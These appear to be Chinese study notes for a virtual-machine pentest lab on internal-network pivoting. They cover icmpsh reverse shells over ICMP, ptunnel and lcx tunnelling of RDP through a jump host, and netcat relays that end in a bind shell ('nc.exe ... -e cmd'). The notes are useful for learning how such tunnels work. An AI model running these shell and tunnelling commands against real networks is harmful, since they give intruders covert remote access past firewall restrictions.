pip
pip分python2 和 python3 版本
pip3: apt-get install python3-pip
pip2: python2 get-pip.py
apt-get install python3-impacket
pip2 install impacket -i https://pypi.douban.com/simple
pip3 install impacket -i https://pypi.douban.com/simple
icmpsh
把可执行程序放到/usr/bin/目录下, 可以快速启用
或者取别名: alias 别名=’指令’ | vim .bashrc
需要在同网段下去做, 如果端口受到限制, 那我们就可以用ICMPSH这款工具去反弹shell
前提: ping未被禁用
依赖环境: python-impacket(python2版本的) pip2 install impacket
icmsh_m.py 源IP 目标IP
icmpsh.exe:
-t target –> 源IP
-d delay 500 –> 延迟的毫秒数
-s bytes 128 –> 缓冲区的大小
-b max blank 30 –> 最大的空白数
1 | 1. 现在kali设置ping代替应答 (必做) |
ptunnel
网段配置: 虚拟网络编辑器 –> 仅主机模式 –> 将主机虚拟适配器连接到此网络的√取消掉, 就模拟外网就ping不到内网了
vm: vmnet0(桥接, 连通物理网段, 与物理机处于同一网段), vmnet1(仅主机模式, 只能ping通同一网段的机器) , vmnet8(nat)
参数:
1 | -p: 远程服务器的ip地址(跳板ip) |
kali:
ptunnel -x 123456 -p 192.168.1.142 -lp 3389 -da 192.168.217.136 -dp 3389
跳板机:
ptunnel -x 123456
访问目标机:
rdesktop 127.0.0.1:3389
访问目标的3389端口(rdp): 如果访问成功, 会导致目标靶机注销当前用户,
windows只允许多个账户只能有一个账户登入
linux: 允许多个账户同时登入
LCX
-listen 本地监听的端口(51) 要转发的端口(3389)
-tran 用于做多层跳板的
-slave 连接ip(跳板机ip) 连接的端口(51) 要传输的ip(127.0.0.1) 要转发的端口(3389)
跳板机:
lcx.exe -listen 51 3389
内网主机:
lcx.exe -slave 192.168.217.138 51 127.0.0.1 3389
访问:
mstsc 跳板机ipc
rdesktop 跳板机ip
NC
kali:
nc -lvvp 3333
跳板机:
nc 192.168.1.135 3333 -c ‘./nc 192.168.217.136 4444’
内网主机:
nc.exe -l -v -p 4444 -e cmd